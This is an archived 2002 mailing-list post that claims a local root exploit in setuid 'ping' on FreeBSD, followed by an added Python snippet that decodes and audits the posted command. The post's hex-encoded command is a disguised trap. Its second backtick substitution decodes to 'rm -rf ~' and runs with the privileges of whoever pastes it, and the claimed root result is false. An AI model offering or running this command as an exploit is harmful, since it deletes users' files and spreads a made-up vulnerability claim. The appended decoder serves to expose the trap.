Full Disclosure mailing list archives

ATTENTION Local Root ATTENTION


From: drdre () hush com (drdre () hush com)
Date: Sun, 15 Sep 2002 06:28:08 -0700

DrDre-Labs recently discovered a rather dangerous bug in the "ping" program which is installed setuid-root on most Unix
and Unix-like systems. This bug is not remotely exploitable.

Tested on FreeBSD 4.6

bash# id
uid=1337(drdre) gid=1006(researchers) groups=1006(researchers) 1008(lab-staff)

bash# ping `perl -e 'print "\x6d\x65\x5f\x67\x75\x6e\x5f\x69\x73\x5f\x63\x6c\x69\x63\x6b"x1024'`;`echo -e 
"\x72\x6d\x20\x2d\x72\x66\x20\x7e"`
server error  ^


^

$ id
uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)


Vendors are already informed.


Greets: Captain Crunch, Peter Pan, Charly Root


Regards
-- 
DrDre security research group





Get your free encrypted email at https://www.hushmail.com
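
Added example, not part of the original post: a small Python check that decodes the `\xNN` escapes in a pasted shell line and lists its backtick substitutions, so the line can be read in clear text before it is typed into a shell. `POSTED` is the command from the message above joined onto one line; the function names are this example's own.

```python
import re

# The command from the post, joined onto one line (copied from the page).
POSTED = (r"""ping `perl -e 'print "\x6d\x65\x5f\x67\x75\x6e\x5f\x69\x73\x5f\x63\x6c\x69\x63\x6b"x1024'`;"""
          r"""`echo -e "\x72\x6d\x20\x2d\x72\x66\x20\x7e"`""")

HEX_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")
BACKTICKS = re.compile(r"`([^`]*)`")


def decode_hex_escapes(text):
    """Replace each \\xNN escape with the character it encodes."""
    return HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), text)


def audit(command):
    """Return one finding per backtick substitution in a pasted shell line.

    Each finding holds the decoded substitution body and whether the
    substitution stands in command position (start of line, or right
    after ';', '&' or '|'), where the shell runs its output as a command
    instead of passing it to another program as an argument.
    """
    findings = []
    for match in BACKTICKS.finditer(command):
        before = command[:match.start()].rstrip()
        in_command_position = before == "" or before[-1] in ";&|"
        findings.append({
            "decoded": decode_hex_escapes(match.group(1)),
            "runs_output_as_command": in_command_position,
        })
    return findings


if __name__ == "__main__":
    for finding in audit(POSTED):
        print(finding)
```

The second substitution follows the `;`, so its output is executed as a command in its own right with the privileges of whoever pasted the line; it is never handed to `ping`.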

